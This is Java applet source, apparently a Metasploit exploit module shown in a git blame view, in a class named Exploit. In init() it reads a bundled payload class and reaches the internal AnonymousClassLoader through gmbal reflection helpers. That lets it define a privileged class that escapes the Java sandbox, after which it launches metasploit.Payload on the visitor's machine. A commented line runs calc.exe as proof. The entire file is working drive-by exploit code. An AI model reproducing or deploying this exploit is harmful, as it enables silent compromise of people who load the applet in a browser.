2012-11-11 16:05:51 +00:00
|
|
|
import java.applet.Applet;
|
|
|
|
import java.io.PrintStream;
|
|
|
|
import java.io.Serializable;
|
|
|
|
import java.lang.reflect.Method;
|
|
|
|
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
|
|
|
|
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
|
|
|
|
import java.io.ByteArrayOutputStream;
|
|
|
|
import java.io.IOException;
|
|
|
|
import java.io.InputStream;
|
|
|
|
import java.io.ObjectInputStream;
|
|
|
|
import java.io.ObjectOutputStream;
|
|
|
|
import metasploit.Payload;
|
|
|
|
//import java.lang.Runtime;
|
|
|
|
|
|
|
|
public class Exploit extends Applet
|
|
|
|
{
|
|
|
|
|
|
|
|
public Exploit()
|
|
|
|
{
|
|
|
|
}
|
|
|
|
|
|
|
|
public byte[] hex2Byte(String str)
|
|
|
|
{
|
|
|
|
byte[] bytes = new byte[str.length() / 2];
|
|
|
|
for (int i = 0; i < bytes.length; i++)
|
|
|
|
{
|
|
|
|
bytes[i] = (byte) Integer
|
|
|
|
.parseInt(str.substring(2 * i, 2 * i + 2), 16);
|
|
|
|
}
|
|
|
|
return bytes;
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public void init()
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
|
|
|
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
|
|
|
byte[] buffer = new byte[8192];
|
|
|
|
int length;
|
|
|
|
|
|
|
|
// read in the class file from the jar
|
|
|
|
InputStream is = getClass().getResourceAsStream("MyPayload.class");
|
|
|
|
// and write it out to the byte array stream
|
|
|
|
while( ( length = is.read( buffer ) ) > 0 )
|
|
|
|
bos.write( buffer, 0, length );
|
|
|
|
// convert it to a simple byte array
|
|
|
|
buffer = bos.toByteArray();
|
|
|
|
|
|
|
|
GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
|
|
|
|
Object obj = genericconstructor.create(new Object[] {});
|
|
|
|
Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
|
|
|
|
Class class1 = (Class)method.invoke(obj, new Object[] {
|
|
|
|
//byte_payload
|
|
|
|
buffer
|
|
|
|
});
|
|
|
|
class1.newInstance();
|
2012-11-11 19:11:33 +00:00
|
|
|
//System.out.println("SecurityManager:" + System.getSecurityManager());
|
2012-11-11 16:05:51 +00:00
|
|
|
//class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
|
|
|
|
Payload.main(null);
|
|
|
|
//Runtime.getRuntime().exec("calc.exe");
|
|
|
|
}
|
|
|
|
catch(Exception exception)
|
|
|
|
{
|
|
|
|
//exception.printStackTrace();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
}
|